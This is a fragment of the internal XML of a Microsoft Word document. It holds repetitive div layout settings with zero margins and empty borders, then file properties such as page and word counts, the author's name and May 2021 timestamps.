          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="7958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545">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2125807942">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="21462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69442">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1248538475">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1017580023">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="15471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8744">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1685857552">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1272204132">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="3117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3039">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1856378663">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1065300148">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1279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79B-8E57-4F4E-A13C-2A5F062B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3</TotalTime>
  <Pages>27</Pages>
  <Words>4610</Words>
  <Characters>31810</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>265</Lines>
  <Paragraphs>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Stiller</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Marianna Stiller</cp:lastModifiedBy>
  <cp:revision>2413</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-04T12:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-12T21:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>